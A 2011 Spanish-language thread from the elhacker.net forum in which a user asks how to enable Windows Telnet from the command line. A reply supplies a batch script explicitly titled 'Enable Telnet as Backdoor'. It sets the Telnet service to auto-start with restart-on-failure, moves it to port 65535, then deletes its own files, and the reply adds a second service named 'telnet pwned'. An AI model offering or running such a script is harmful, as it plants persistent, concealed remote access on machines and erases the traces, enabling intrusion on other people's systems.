elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Foros Generales
| |-+  Dudas Generales (Moderador: engel lex)
| | |-+  Ayuda!! Telnet
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda!! Telnet  (Leído 3,201 veces)
<<<-Basura->>>


Desconectado Desconectado

Mensajes: 388



Ver Perfil
Ayuda!! Telnet
« en: 20 Noviembre 2011, 10:03 am »

Hola se como habilitar el telnet desde la interface gráfica de windows Xp, pero lo que ando buscando es como habilitar el telnet desde la linea de comando

conozco este comando:

net start "telnet"      // sirve para habilitarlo si el servicio esta en manual


PD. lo que quiero es poner el servicio telnet en manual, jeje desde la linea de comando, ayuda porfavor :S
En teoría esta el la ruta del ejecutable:
C:\WINDOWS\system32\tlntsvr.exe


En línea

<<<--Basura-->>>
madpitbull_99
Colaborador
***
Desconectado Desconectado

Mensajes: 1.911



Ver Perfil WWW
Re: Ayuda!! Telnet
« Respuesta #1 en: 20 Noviembre 2011, 10:32 am »

Con un simple script en batch:

Código
  1. @echo off
  2. @echo Enable Telnet as Backdoor on 2k
  3. echo.
  4. @echo Changing registry ...
  5. @echo REGEDIT4>temp.reg
  6. echo. >>temp.reg
  7. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TlntSvr]>>temp.reg
  8. echo. >>temp.reg
  9. echo "ErrorControl"=dword:00000001>>temp.reg
  10. echo "Start"=dword:00000002>>temp.reg
  11. echo "Type"=dword:00000010>>temp.reg
  12. echo "FailureActions"=hex:00,00,00,00,00,00,00,00,00,00,00,00,03,00,00,00,38,65,11,00,01,00,00,00,60,e
  13. a,00,00,01,00,00,00,60,ea,00,00,01,00,00,00,60,ea,00,00>>temp.reg
  14. echo. >>temp.reg
  15. echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>temp.reg
  16. echo. >>temp.reg
  17. echo "NTLM"=dword:00000001>>temp.reg
  18. echo "TelnetPort"=dword:0000ffff>>temp.reg
  19. echo.
  20. regedit /s temp.reg
  21. echo Starting Service
  22. net start tlntsvr
  23. echo cleanup
  24. del temp.reg
  25. del install.cmd

Otra opción es crear otro servicio para el telnet y activarlo:

services CREATESVRANY "telnet2" "telnet pwned" "c:\windows\svrany.exe" "c:\windows\system32\tlntsvr.exe"
net start telnet2


En Windows 7 hay otra opción:

Activar el cliente.
pkgmgr /iu:”TelnetClient” 


Activar el servidor.
pkgmgr /iu:”TelnetServer”



En línea



«Si quieres la paz prepárate para la guerra» Flavius Vegetius

[Taller]Instalación/Configuración y Teoría de Servicios en Red
<<<-Basura->>>


Desconectado Desconectado

Mensajes: 388



Ver Perfil
Re: Ayuda!! Telnet
« Respuesta #2 en: 20 Noviembre 2011, 23:23 pm »

Muy bueno tu código, me puse a estudiarlo y ya lo entiendo, esta muy interesando  ;-) ;-) ;-) ;-) ;-) Gracias!!
En línea

<<<--Basura-->>>
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda, con telnet
Dudas Generales
maxx93 3 2,578 Último mensaje 28 Junio 2010, 05:13 am
por Mr.Blue
Ayuda con telnet.
Hacking
prometheus48 4 2,497 Último mensaje 9 Agosto 2012, 23:15 pm
por prometheus48
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines